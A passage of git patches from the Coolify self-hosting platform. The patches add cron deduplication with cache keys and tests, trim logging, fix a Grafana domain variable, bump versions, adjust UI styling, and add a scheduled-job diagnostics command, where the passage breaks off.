+        $shouldRunPatchCheck = $this->shouldRunNow('0 0 * * 0', $serverTimezone, "server-patch-check:{$server->id}");
 
         if ($shouldRunPatchCheck) { // Weekly on Sunday at midnight
             ServerPatchCheckJob::dispatch($server);
@@ -167,7 +168,14 @@ private function processServerTasks(Server $server): void
         // Crash recovery is handled by sentinelOutOfSync → ServerCheckJob → CheckAndStartSentinelJob.
     }
 
-    private function shouldRunNow(string $frequency, ?string $timezone = null): bool
+    /**
+     * Determine if a cron schedule should run now.
+     *
+     * When a dedupKey is provided, uses getPreviousRunDate() + last-dispatch tracking
+     * instead of isDue(). This is resilient to queue delays — even if the job is delayed
+     * by minutes, it still catches the missed cron window.
+     */
+    private function shouldRunNow(string $frequency, ?string $timezone = null, ?string $dedupKey = null): bool
     {
         $cron = new CronExpression($frequency);
 
@@ -175,6 +183,29 @@ private function shouldRunNow(string $frequency, ?string $timezone = null): bool
         $baseTime = $this->executionTime ?? Carbon::now();
         $executionTime = $baseTime->copy()->setTimezone($timezone ?? config('app.timezone'));
 
-        return $cron->isDue($executionTime);
+        if ($dedupKey === null) {
+            return $cron->isDue($executionTime);
+        }
+
+        $previousDue = Carbon::instance($cron->getPreviousRunDate($executionTime, allowCurrentDate: true));
+
+        $lastDispatched = Cache::get($dedupKey);
+
+        if ($lastDispatched === null) {
+            $isDue = $cron->isDue($executionTime);
+            if ($isDue) {
+                Cache::put($dedupKey, $executionTime->toIso8601String(), 86400);
+            }
+
+            return $isDue;
+        }
+
+        if ($previousDue->gt(Carbon::parse($lastDispatched))) {
+            Cache::put($dedupKey, $executionTime->toIso8601String(), 86400);
+
+            return true;
+        }
+
+        return false;
     }
 }
diff --git a/tests/Feature/ScheduledJobManagerShouldRunNowTest.php b/tests/Feature/ScheduledJobManagerShouldRunNowTest.php
index f820c3777..e445e9908 100644
--- a/tests/Feature/ScheduledJobManagerShouldRunNowTest.php
+++ b/tests/Feature/ScheduledJobManagerShouldRunNowTest.php
@@ -194,6 +194,55 @@
     expect($result2)->toBeFalse();
 });
 
+it('catches delayed docker cleanup when job runs past the cron minute', function () {
+    // Simulate a previous dispatch at :10
+    Cache::put('docker-cleanup:42', Carbon::create(2026, 2, 28, 10, 10, 0, 'UTC')->toIso8601String(), 86400);
+
+    // Freeze time at :22 — job was delayed 2 minutes past the :20 cron window
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 22, 0, 'UTC'));
+
+    $job = new ScheduledJobManager;
+    $reflection = new ReflectionClass($job);
+
+    $executionTimeProp = $reflection->getProperty('executionTime');
+    $executionTimeProp->setAccessible(true);
+    $executionTimeProp->setValue($job, Carbon::now());
+
+    $method = $reflection->getMethod('shouldRunNow');
+    $method->setAccessible(true);
+
+    // isDue() would return false at :22, but getPreviousRunDate() = :20
+    // lastDispatched = :10 → :20 > :10 → fires
+    $result = $method->invoke($job, '*/10 * * * *', 'UTC', 'docker-cleanup:42');
+
+    expect($result)->toBeTrue();
+});
+
+it('does not double-dispatch docker cleanup within same cron window', function () {
+    // First dispatch at :10
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 10, 0, 'UTC'));
+
+    $job = new ScheduledJobManager;
+    $reflection = new ReflectionClass($job);
+
+    $executionTimeProp = $reflection->getProperty('executionTime');
+    $executionTimeProp->setAccessible(true);
+    $executionTimeProp->setValue($job, Carbon::now());
+
+    $method = $reflection->getMethod('shouldRunNow');
+    $method->setAccessible(true);
+
+    $first = $method->invoke($job, '*/10 * * * *', 'UTC', 'docker-cleanup:99');
+    expect($first)->toBeTrue();
+
+    // Second run at :11 — should NOT dispatch (previousDue=:10, lastDispatched=:10)
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 11, 0, 'UTC'));
+    $executionTimeProp->setValue($job, Carbon::now());
+
+    $second = $method->invoke($job, '*/10 * * * *', 'UTC', 'docker-cleanup:99');
+    expect($second)->toBeFalse();
+});
+
 it('respects server timezone for cron evaluation', function () {
     // UTC time is 22:00 Feb 28, which is 06:00 Mar 1 in Asia/Singapore (+8)
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 22, 0, 0, 'UTC'));
diff --git a/tests/Feature/ServerManagerJobShouldRunNowTest.php b/tests/Feature/ServerManagerJobShouldRunNowTest.php
new file mode 100644
index 000000000..518f05c9c
--- /dev/null
+++ b/tests/Feature/ServerManagerJobShouldRunNowTest.php
@@ -0,0 +1,102 @@
+<?php
+
+use App\Jobs\ServerManagerJob;
+use Illuminate\Support\Carbon;
+use Illuminate\Support\Facades\Cache;
+
+beforeEach(function () {
+    Cache::flush();
+});
+
+it('catches delayed sentinel restart when job runs past midnight', function () {
+    // Simulate previous dispatch yesterday at midnight
+    Cache::put('sentinel-restart:1', Carbon::create(2026, 2, 27, 0, 0, 0, 'UTC')->toIso8601String(), 86400);
+
+    // Job runs 3 minutes late at 00:03
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 0, 3, 0, 'UTC'));
+
+    $job = new ServerManagerJob;
+    $reflection = new ReflectionClass($job);
+
+    $executionTimeProp = $reflection->getProperty('executionTime');
+    $executionTimeProp->setAccessible(true);
+    $executionTimeProp->setValue($job, Carbon::now());
+
+    $method = $reflection->getMethod('shouldRunNow');
+    $method->setAccessible(true);
+
+    // isDue() would return false at 00:03, but getPreviousRunDate() = 00:00 today
+    // lastDispatched = yesterday 00:00 → today 00:00 > yesterday → fires
+    $result = $method->invoke($job, '0 0 * * *', 'UTC', 'sentinel-restart:1');
+
+    expect($result)->toBeTrue();
+});
+
+it('catches delayed weekly patch check when job runs past the cron minute', function () {
+    // Simulate previous dispatch last Sunday at midnight
+    Cache::put('server-patch-check:1', Carbon::create(2026, 2, 22, 0, 0, 0, 'UTC')->toIso8601String(), 86400);
+
+    // This Sunday at 00:02 — job was delayed 2 minutes
+    // 2026-03-01 is a Sunday
+    Carbon::setTestNow(Carbon::create(2026, 3, 1, 0, 2, 0, 'UTC'));
+
+    $job = new ServerManagerJob;
+    $reflection = new ReflectionClass($job);
+
+    $executionTimeProp = $reflection->getProperty('executionTime');
+    $executionTimeProp->setAccessible(true);
+    $executionTimeProp->setValue($job, Carbon::now());
+
+    $method = $reflection->getMethod('shouldRunNow');
+    $method->setAccessible(true);
+
+    $result = $method->invoke($job, '0 0 * * 0', 'UTC', 'server-patch-check:1');
+
+    expect($result)->toBeTrue();
+});
+
+it('catches delayed storage check when job runs past the cron minute', function () {
+    // Simulate previous dispatch yesterday at 23:00
+    Cache::put('server-storage-check:5', Carbon::create(2026, 2, 27, 23, 0, 0, 'UTC')->toIso8601String(), 86400);
+
+    // Today at 23:04 — job was delayed 4 minutes
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 23, 4, 0, 'UTC'));
+
+    $job = new ServerManagerJob;
+    $reflection = new ReflectionClass($job);
+
+    $executionTimeProp = $reflection->getProperty('executionTime');
+    $executionTimeProp->setAccessible(true);
+    $executionTimeProp->setValue($job, Carbon::now());
+
+    $method = $reflection->getMethod('shouldRunNow');
+    $method->setAccessible(true);
+
+    $result = $method->invoke($job, '0 23 * * *', 'UTC', 'server-storage-check:5');
+
+    expect($result)->toBeTrue();
+});
+
+it('does not double-dispatch within same cron window', function () {
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 0, 0, 0, 'UTC'));
+
+    $job = new ServerManagerJob;
+    $reflection = new ReflectionClass($job);
+
+    $executionTimeProp = $reflection->getProperty('executionTime');
+    $executionTimeProp->setAccessible(true);
+    $executionTimeProp->setValue($job, Carbon::now());
+
+    $method = $reflection->getMethod('shouldRunNow');
+    $method->setAccessible(true);
+
+    $first = $method->invoke($job, '0 0 * * *', 'UTC', 'sentinel-restart:10');
+    expect($first)->toBeTrue();
+
+    // Next minute — should NOT dispatch again
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 0, 1, 0, 'UTC'));
+    $executionTimeProp->setValue($job, Carbon::now());
+
+    $second = $method->invoke($job, '0 0 * * *', 'UTC', 'sentinel-restart:10');
+    expect($second)->toBeFalse();
+});

From fef8e0b622706b5d7bacbbecc696d9c9eb783cdd Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 20 Mar 2026 15:57:26 +0100
Subject: [PATCH 098/213] refactor: remove verbose logging and use explicit
 exception types

- Remove verbose warning/debug logs from ServerConnectionCheckJob and ContainerStatusAggregator
- Silently ignore expected errors (e.g., deleted Hetzner servers)
- Replace generic RuntimeException with DeploymentException for deployment command failures
- Catch both RuntimeException and DeploymentException in command retry logic
---
 app/Jobs/ServerConnectionCheckJob.php      | 11 ++---------
 app/Services/ContainerStatusAggregator.php | 14 --------------
 app/Traits/ExecuteRemoteCommand.php        |  5 +++--
 3 files changed, 5 insertions(+), 25 deletions(-)

diff --git a/app/Jobs/ServerConnectionCheckJob.php b/app/Jobs/ServerConnectionCheckJob.php
index d4a499865..2c73ae43e 100644
--- a/app/Jobs/ServerConnectionCheckJob.php
+++ b/app/Jobs/ServerConnectionCheckJob.php
@@ -108,10 +108,6 @@ public function handle()
     public function failed(?\Throwable $exception): void
     {
         if ($exception instanceof \Illuminate\Queue\TimeoutExceededException) {
-            Log::warning('ServerConnectionCheckJob timed out', [
-                'server_id' => $this->server->id,
-                'server_name' => $this->server->name,
-            ]);
             $this->server->settings->update([
                 'is_reachable' => false,
                 'is_usable' => false,
@@ -131,11 +127,8 @@ private function checkHetznerStatus(): void
             $serverData = $hetznerService->getServer($this->server->hetzner_server_id);
             $status = $serverData['status'] ?? null;
 
-        } catch (\Throwable $e) {
-            Log::debug('ServerConnectionCheck: Hetzner status check failed', [
-                'server_id' => $this->server->id,
-                'error' => $e->getMessage(),
-            ]);
+        } catch (\Throwable) {
+            // Silently ignore — server may have been deleted from Hetzner.
         }
         if ($this->server->hetzner_server_status !== $status) {
             $this->server->update(['hetzner_server_status' => $status]);
diff --git a/app/Services/ContainerStatusAggregator.php b/app/Services/ContainerStatusAggregator.php
index 2be36d905..8859a9980 100644
--- a/app/Services/ContainerStatusAggregator.php
+++ b/app/Services/ContainerStatusAggregator.php
@@ -54,13 +54,6 @@ public function aggregateFromStrings(Collection $containerStatuses, int $maxRest
             $maxRestartCount = 0;
         }
 
-        if ($maxRestartCount > 1000) {
-            Log::warning('High maxRestartCount detected', [
-                'maxRestartCount' => $maxRestartCount,
-                'containers' => $containerStatuses->count(),
-            ]);
-        }
-
         if ($containerStatuses->isEmpty()) {
             return 'exited';
         }
@@ -138,13 +131,6 @@ public function aggregateFromContainers(Collection $containers, int $maxRestartC
             $maxRestartCount = 0;
         }
 
-        if ($maxRestartCount > 1000) {
-            Log::warning('High maxRestartCount detected', [
-                'maxRestartCount' => $maxRestartCount,
-                'containers' => $containers->count(),
-            ]);
-        }
-
         if ($containers->isEmpty()) {
             return 'exited';
         }
diff --git a/app/Traits/ExecuteRemoteCommand.php b/app/Traits/ExecuteRemoteCommand.php
index a4ea6abe5..72e0adde8 100644
--- a/app/Traits/ExecuteRemoteCommand.php
+++ b/app/Traits/ExecuteRemoteCommand.php
@@ -3,6 +3,7 @@
 namespace App\Traits;
 
 use App\Enums\ApplicationDeploymentStatus;
+use App\Exceptions\DeploymentException;
 use App\Helpers\SshMultiplexingHelper;
 use App\Models\Server;
 use Carbon\Carbon;
@@ -103,7 +104,7 @@ public function execute_remote_command(...$commands)
                 try {
                     $this->executeCommandWithProcess($command, $hidden, $customType, $append, $ignore_errors);
                     $commandExecuted = true;
-                } catch (\RuntimeException $e) {
+                } catch (\RuntimeException|DeploymentException $e) {
                     $lastError = $e;
                     $errorMessage = $e->getMessage();
                     // Only retry if it's an SSH connection error and we haven't exhausted retries
@@ -233,7 +234,7 @@ private function executeCommandWithProcess($command, $hidden, $customType, $appe
                     $error = $process_result->output() ?: 'Command failed with no error output';
                 }
                 $redactedCommand = $this->redact_sensitive_info($command);
-                throw new \RuntimeException("Command execution failed (exit code {$process_result->exitCode()}): {$redactedCommand}\nError: {$error}");
+                throw new DeploymentException("Command execution failed (exit code {$process_result->exitCode()}): {$redactedCommand}\nError: {$error}");
             }
         }
     }

From 1511797e0a03a29349b1d71e9015ea00a713feff Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 20 Mar 2026 15:59:23 +0100
Subject: [PATCH 099/213] fix(docker): skip cleanup stale warning on cloud
 instances

---
 resources/views/livewire/server/docker-cleanup.blade.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/resources/views/livewire/server/docker-cleanup.blade.php b/resources/views/livewire/server/docker-cleanup.blade.php
index 2fd8fc2ab..ac48651ae 100644
--- a/resources/views/livewire/server/docker-cleanup.blade.php
+++ b/resources/views/livewire/server/docker-cleanup.blade.php
@@ -27,7 +27,7 @@
                     <div class="mt-1 mb-6">Configure Docker cleanup settings for your server.</div>
                 </div>
 
-                @if ($this->isCleanupStale)
+                @if (!isCloud() && $this->isCleanupStale)
                     <div class="mb-4">
                         <x-callout type="warning" title="Docker Cleanup May Be Stalled">
                             <p>The last Docker cleanup ran {{ $this->lastExecutionTime ?? 'unknown time' }} ago,

From 95351eba8939d321e26139fa0636693730fe1e69 Mon Sep 17 00:00:00 2001
From: Xidik <xidik12@gmail.com>
Date: Sun, 22 Mar 2026 22:04:22 +0700
Subject: [PATCH 100/213] fix(service): use FQDN instead of URL for Grafana
 GF_SERVER_DOMAIN

GF_SERVER_DOMAIN expects a bare hostname (e.g. grafana.example.com) but
was set to SERVICE_URL_GRAFANA which includes the protocol
(https://grafana.example.com). This mismatch can cause Grafana to fail
to load its application files when deployed behind Coolify's proxy.

Changed to SERVICE_FQDN_GRAFANA which provides just the hostname. Applied
the fix to both grafana.yaml and grafana-with-postgresql.yaml templates.

Fixes #5307
---
 templates/compose/grafana-with-postgresql.yaml | 2 +-
 templates/compose/grafana.yaml                 | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates/compose/grafana-with-postgresql.yaml b/templates/compose/grafana-with-postgresql.yaml
index 25add4cc2..6c5dda659 100644
--- a/templates/compose/grafana-with-postgresql.yaml
+++ b/templates/compose/grafana-with-postgresql.yaml
@@ -11,7 +11,7 @@ services:
     environment:
       - SERVICE_URL_GRAFANA_3000
       - GF_SERVER_ROOT_URL=${SERVICE_URL_GRAFANA}
-      - GF_SERVER_DOMAIN=${SERVICE_URL_GRAFANA}
+      - GF_SERVER_DOMAIN=${SERVICE_FQDN_GRAFANA}
       - GF_SECURITY_ADMIN_PASSWORD=${SERVICE_PASSWORD_GRAFANA}
       - GF_DATABASE_TYPE=postgres
       - GF_DATABASE_HOST=postgresql
diff --git a/templates/compose/grafana.yaml b/templates/compose/grafana.yaml
index a570c6c79..ed1689f58 100644
--- a/templates/compose/grafana.yaml
+++ b/templates/compose/grafana.yaml
@@ -11,7 +11,7 @@ services:
     environment:
       - SERVICE_URL_GRAFANA_3000
       - GF_SERVER_ROOT_URL=${SERVICE_URL_GRAFANA}
-      - GF_SERVER_DOMAIN=${SERVICE_URL_GRAFANA}
+      - GF_SERVER_DOMAIN=${SERVICE_FQDN_GRAFANA}
       - GF_SECURITY_ADMIN_PASSWORD=${SERVICE_PASSWORD_GRAFANA}
     volumes:
       - grafana-data:/var/lib/grafana

From 820ee1c03cbadcf5a5e269be7a37e8a71d5e2022 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 10:34:58 +0100
Subject: [PATCH 101/213] docs(sponsors): update Brand.dev to Context.dev

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index b7aefe16a..73af2a18c 100644
--- a/README.md
+++ b/README.md
@@ -70,7 +70,7 @@ ### Big Sponsors
 * [Arcjet](https://arcjet.com?ref=coolify.io) - Advanced web security and performance solutions
 * [BC Direct](https://bc.direct?ref=coolify.io) - Your trusted technology consulting partner
 * [Blacksmith](https://blacksmith.sh?ref=coolify.io) - Infrastructure automation platform
-* [Brand.dev](https://brand.dev?ref=coolify.io) - API to personalize your product with logos, colors, and company info from any domain
+* [Context.dev](https://context.dev?ref=coolify.io) - API to personalize your product with logos, colors, and company info from any domain
 * [ByteBase](https://www.bytebase.com?ref=coolify.io) - Database CI/CD and Security at Scale
 * [CodeRabbit](https://coderabbit.ai?ref=coolify.io) - Cut Code Review Time & Bugs in Half
 * [COMIT](https://comit.international?ref=coolify.io) - New York Times award–winning contractor

From 069bf4cc82c1d534d0ef0df3d3d4679c1f827a36 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 10:35:16 +0100
Subject: [PATCH 102/213] chore(versions): bump coolify, sentinel, and traefik
 versions

---
 other/nightly/versions.json | 8 ++++----
 versions.json               | 8 ++++----
 2 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/other/nightly/versions.json b/other/nightly/versions.json
index 7564f625e..57bb21869 100644
--- a/other/nightly/versions.json
+++ b/other/nightly/versions.json
@@ -1,7 +1,7 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.469"
+            "version": "4.0.0-beta.470"
         },
         "nightly": {
             "version": "4.0.0"
@@ -13,17 +13,17 @@
             "version": "1.0.11"
         },
         "sentinel": {
-            "version": "0.0.19"
+            "version": "0.0.20"
         }
     },
     "traefik": {
-        "v3.6": "3.6.5",
+        "v3.6": "3.6.11",
         "v3.5": "3.5.6",
         "v3.4": "3.4.5",
         "v3.3": "3.3.7",
         "v3.2": "3.2.5",
         "v3.1": "3.1.7",
         "v3.0": "3.0.4",
-        "v2.11": "2.11.32"
+        "v2.11": "2.11.40"
     }
 }
diff --git a/versions.json b/versions.json
index 7564f625e..57bb21869 100644
--- a/versions.json
+++ b/versions.json
@@ -1,7 +1,7 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.469"
+            "version": "4.0.0-beta.470"
         },
         "nightly": {
             "version": "4.0.0"
@@ -13,17 +13,17 @@
             "version": "1.0.11"
         },
         "sentinel": {
-            "version": "0.0.19"
+            "version": "0.0.20"
         }
     },
     "traefik": {
-        "v3.6": "3.6.5",
+        "v3.6": "3.6.11",
         "v3.5": "3.5.6",
         "v3.4": "3.4.5",
         "v3.3": "3.3.7",
         "v3.2": "3.2.5",
         "v3.1": "3.1.7",
         "v3.0": "3.0.4",
-        "v2.11": "2.11.32"
+        "v2.11": "2.11.40"
     }
 }

From f0ed05b399bdfa9697423f4cfbab5b8722529519 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 10:35:47 +0100
Subject: [PATCH 103/213] fix(docker): log failed cleanup attempts when server
 is not functional

---
 app/Jobs/DockerCleanupJob.php | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/app/Jobs/DockerCleanupJob.php b/app/Jobs/DockerCleanupJob.php
index a8a3cb159..16f3d88ad 100644
--- a/app/Jobs/DockerCleanupJob.php
+++ b/app/Jobs/DockerCleanupJob.php
@@ -46,14 +46,20 @@ public function __construct(
     public function handle(): void
     {
         try {
-            if (! $this->server->isFunctional()) {
-                return;
-            }
-
             $this->execution_log = DockerCleanupExecution::create([
                 'server_id' => $this->server->id,
             ]);
 
+            if (! $this->server->isFunctional()) {
+                $this->execution_log->update([
+                    'status' => 'failed',
+                    'message' => 'Server is not functional (unreachable, unusable, or disabled)',
+                    'finished_at' => Carbon::now()->toImmutable(),
+                ]);
+
+                return;
+            }
+
             $this->usageBefore = $this->server->getDiskUsage();
 
             if ($this->manualCleanup || $this->server->settings->force_docker_cleanup) {

From 89f2b83104cce1b4117b28539c5abb57d9b3522d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 10:36:08 +0100
Subject: [PATCH 104/213] style(modal-confirmation): improve mobile
 responsiveness

Make modal full-screen on mobile devices with responsive padding,
border radius, and dimensions. Modal is now full-screen on small
screens and constrained to max-width/max-height on larger screens.
---
 resources/views/components/modal-confirmation.blade.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/resources/views/components/modal-confirmation.blade.php b/resources/views/components/modal-confirmation.blade.php
index 615512b94..c1e8a3e54 100644
--- a/resources/views/components/modal-confirmation.blade.php
+++ b/resources/views/components/modal-confirmation.blade.php
@@ -190,7 +190,7 @@ class="relative w-auto h-auto">
     @endif
     <template x-teleport="body">
         <div x-show="modalOpen"
-            class="fixed top-0 left-0 z-99 flex items-center justify-center w-screen h-screen p-4" x-cloak>
+            class="fixed top-0 left-0 z-99 flex items-center justify-center w-screen h-screen p-0 sm:p-4" x-cloak>
             <div x-show="modalOpen" class="absolute inset-0 w-full h-full bg-black/20 backdrop-blur-xs">
             </div>
             <div x-show="modalOpen" x-trap.inert.noscroll="modalOpen" x-transition:enter="ease-out duration-100"
@@ -199,7 +199,7 @@ class="fixed top-0 left-0 z-99 flex items-center justify-center w-screen h-scree
                 x-transition:leave="ease-in duration-100"
                 x-transition:leave-start="opacity-100 translate-y-0 sm:scale-100"
                 x-transition:leave-end="opacity-0 -translate-y-2 sm:scale-95"
-                class="relative w-full border rounded-sm min-w-full lg:min-w-[36rem] max-w-[48rem] max-h-[calc(100vh-2rem)] bg-neutral-100 border-neutral-400 dark:bg-base dark:border-coolgray-300 flex flex-col">
+                class="relative w-full border rounded-none sm:rounded-sm min-w-full lg:min-w-[36rem] max-w-full sm:max-w-[48rem] h-screen sm:h-auto max-h-screen sm:max-h-[calc(100vh-2rem)] bg-neutral-100 border-neutral-400 dark:bg-base dark:border-coolgray-300 flex flex-col">
                 <div class="flex justify-between items-center py-6 px-7 shrink-0">
                     <h3 class="pr-8 text-2xl font-bold">{{ $title }}</h3>
                     <button @click="modalOpen = false; resetModal()"

From f8f27fff138fea0b03121b14fa002459328a620f Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 10:37:49 +0100
Subject: [PATCH 105/213] refactor(scheduler): extract cron scheduling logic to
 shared helper

Extract the shouldRunNow() method from ScheduledJobManager and ServerManagerJob into
a reusable shouldRunCronNow() helper function. This centralizes cron scheduling logic
and enables consistent deduplication behavior across all scheduled job types.

- Create shouldRunCronNow() helper in bootstrap/helpers/shared.php with timezone
  and dedup support
- Refactor ScheduledJobManager and ServerManagerJob to use the shared helper
- Add ScheduledJobDiagnostics command for inspecting cache state and scheduling
  decisions across all scheduled jobs
- Simplify shouldRunNow tests to directly test the helper function
- Add DockerCleanupJob test for error handling and execution tracking
- Increase scheduled log retention from 1 to 7 days
---
 .../Commands/ScheduledJobDiagnostics.php      | 255 ++++++++++++++++++
 app/Jobs/ScheduledJobManager.php              |  52 +---
 app/Jobs/ServerManagerJob.php                 |  53 +---
 bootstrap/helpers/shared.php                  |  30 +++
 config/logging.php                            |   2 +-
 tests/Feature/DockerCleanupJobTest.php        |  50 ++++
 .../ScheduledJobManagerShouldRunNowTest.php   | 229 +++++-----------
 .../ServerManagerJobShouldRunNowTest.php      |  92 +++----
 8 files changed, 446 insertions(+), 317 deletions(-)
 create mode 100644 app/Console/Commands/ScheduledJobDiagnostics.php
 create mode 100644 tests/Feature/DockerCleanupJobTest.php

diff --git a/app/Console/Commands/ScheduledJobDiagnostics.php b/app/Console/Commands/ScheduledJobDiagnostics.php
new file mode 100644
index 000000000..77881284c
--- /dev/null
+++ b/app/Console/Commands/ScheduledJobDiagnostics.php
@@ -0,0 +1,255 @@
+<?php
+
+namespace App\Console\Commands;
+
+use App\Models\DockerCleanupExecution;
+use App\Models\ScheduledDatabaseBackup;
+use App\Models\ScheduledTask;
+use App\Models\Server;
+use App\Models\Team;
+use Illuminate\Console\Command;
+use Illuminate\Support\Carbon;
+use Illuminate\Support\Facades\Cache;
+
+class ScheduledJobDiagnostics extends Command
+{
+    protected $signature = 'scheduled:diagnostics
+        {--type=all : Type to inspect: docker-cleanup, backups, tasks, server-jobs, all}
+        {--server= : Filter by server ID}';
+
+    protected $description = 'Inspect dedup cache state and scheduling decisions for all scheduled jobs';
+
+    public function handle(): int
+    {
+        $type = $this->option('type');
+        $serverFilter = $this->option('server');
+
+        $this->outputHeartbeat();
+
+        if (in_array($type, ['all', 'docker-cleanup'])) {
+            $this->inspectDockerCleanups($serverFilter);
+        }
+
+        if (in_array($type, ['all', 'backups'])) {
+            $this->inspectBackups();
+        }
+
+        if (in_array($type, ['all', 'tasks'])) {
+            $this->inspectTasks();
+        }
+
+        if (in_array($type, ['all', 'server-jobs'])) {
+            $this->inspectServerJobs($serverFilter);
+        }
+
+        return self::SUCCESS;
+    }
+
+    private function outputHeartbeat(): void
+    {
+        $heartbeat = Cache::get('scheduled-job-manager:heartbeat');
+        if ($heartbeat) {
+            $age = Carbon::parse($heartbeat)->diffForHumans();
+            $this->info("Scheduler heartbeat: {$heartbeat} ({$age})");
+        } else {
+            $this->error('Scheduler heartbeat: MISSING — ScheduledJobManager may not be running');
+        }
+        $this->newLine();
+    }
+
+    private function inspectDockerCleanups(?string $serverFilter): void
+    {
+        $this->info('=== Docker Cleanup Jobs ===');
+
+        $servers = $this->getServers($serverFilter);
+
+        $rows = [];
+        foreach ($servers as $server) {
+            $frequency = data_get($server->settings, 'docker_cleanup_frequency', '0 * * * *');
+            if (isset(VALID_CRON_STRINGS[$frequency])) {
+                $frequency = VALID_CRON_STRINGS[$frequency];
+            }
+
+            $dedupKey = "docker-cleanup:{$server->id}";
+            $cacheValue = Cache::get($dedupKey);
+            $timezone = data_get($server->settings, 'server_timezone', config('app.timezone'));
+
+            if (validate_timezone($timezone) === false) {
+                $timezone = config('app.timezone');
+            }
+
+            $wouldFire = shouldRunCronNow($frequency, $timezone, $dedupKey);
+
+            $lastExecution = DockerCleanupExecution::where('server_id', $server->id)
+                ->latest()
+                ->first();
+
+            $rows[] = [
+                $server->id,
+                $server->name,
+                $timezone,
+                $frequency,
+                $dedupKey,
+                $cacheValue ?? '<missing>',
+                $wouldFire ? 'YES' : 'no',
+                $lastExecution ? $lastExecution->status.' @ '.$lastExecution->created_at : 'never',
+            ];
+        }
+
+        $this->table(
+            ['ID', 'Server', 'TZ', 'Frequency', 'Dedup Key', 'Cache Value', 'Would Fire', 'Last Execution'],
+            $rows
+        );
+        $this->newLine();
+    }
+
+    private function inspectBackups(): void
+    {
+        $this->info('=== Scheduled Backups ===');
+
+        $backups = ScheduledDatabaseBackup::with(['database'])
+            ->where('enabled', true)
+            ->get();
+
+        $rows = [];
+        foreach ($backups as $backup) {
+            $server = $backup->server();
+            $frequency = $backup->frequency;
+            if (isset(VALID_CRON_STRINGS[$frequency])) {
+                $frequency = VALID_CRON_STRINGS[$frequency];
+            }
+
+            $dedupKey = "scheduled-backup:{$backup->id}";
+            $cacheValue = Cache::get($dedupKey);
+            $timezone = $server ? data_get($server->settings, 'server_timezone', config('app.timezone')) : config('app.timezone');
+
+            if (validate_timezone($timezone) === false) {
+                $timezone = config('app.timezone');
+            }
+
+            $wouldFire = shouldRunCronNow($frequency, $timezone, $dedupKey);
+
+            $rows[] = [
+                $backup->id,
+                $backup->database_type ?? 'unknown',
+                $server?->name ?? 'N/A',
+                $frequency,
+                $cacheValue ?? '<missing>',
+                $wouldFire ? 'YES' : 'no',
+            ];
+        }
+
+        $this->table(
+            ['Backup ID', 'DB Type', 'Server', 'Frequency', 'Cache Value', 'Would Fire'],
+            $rows
+        );
+        $this->newLine();
+    }
+
+    private function inspectTasks(): void
+    {
+        $this->info('=== Scheduled Tasks ===');
+
+        $tasks = ScheduledTask::with(['service', 'application'])
+            ->where('enabled', true)
+            ->get();
+
+        $rows = [];
+        foreach ($tasks as $task) {
+            $server = $task->server();
+            $frequency = $task->frequency;
+            if (isset(VALID_CRON_STRINGS[$frequency])) {
+                $frequency = VALID_CRON_STRINGS[$frequency];
+            }
+
+            $dedupKey = "scheduled-task:{$task->id}";
+            $cacheValue = Cache::get($dedupKey);
+            $timezone = $server ? data_get($server->settings, 'server_timezone', config('app.timezone')) : config('app.timezone');
+
+            if (validate_timezone($timezone) === false) {
+                $timezone = config('app.timezone');
+            }
+
+            $wouldFire = shouldRunCronNow($frequency, $timezone, $dedupKey);
+
+            $rows[] = [
+                $task->id,
+                $task->name,
+                $server?->name ?? 'N/A',
+                $frequency,
+                $cacheValue ?? '<missing>',
+                $wouldFire ? 'YES' : 'no',
+            ];
+        }
+
+        $this->table(
+            ['Task ID', 'Name', 'Server', 'Frequency', 'Cache Value', 'Would Fire'],
+            $rows
+        );
+        $this->newLine();
+    }
+
+    private function inspectServerJobs(?string $serverFilter): void
+    {
+        $this->info('=== Server Manager Jobs ===');
+
+        $servers = $this->getServers($serverFilter);
+
+        $rows = [];
+        foreach ($servers as $server) {
+            $timezone = data_get($server->settings, 'server_timezone', config('app.timezone'));
+            if (validate_timezone($timezone) === false) {
+                $timezone = config('app.timezone');
+            }
+
+            $dedupKeys = [
+                "sentinel-restart:{$server->id}" => '0 0 * * *',
+                "server-patch-check:{$server->id}" => '0 0 * * 0',
+                "server-check:{$server->id}" => isCloud() ? '*/5 * * * *' : '* * * * *',
+                "server-storage-check:{$server->id}" => data_get($server->settings, 'server_disk_usage_check_frequency', '0 23 * * *'),
+            ];
+
+            foreach ($dedupKeys as $dedupKey => $frequency) {
+                if (isset(VALID_CRON_STRINGS[$frequency])) {
+                    $frequency = VALID_CRON_STRINGS[$frequency];
+                }
+
+                $cacheValue = Cache::get($dedupKey);
+                $wouldFire = shouldRunCronNow($frequency, $timezone, $dedupKey);
+
+                $rows[] = [
+                    $server->id,
+                    $server->name,
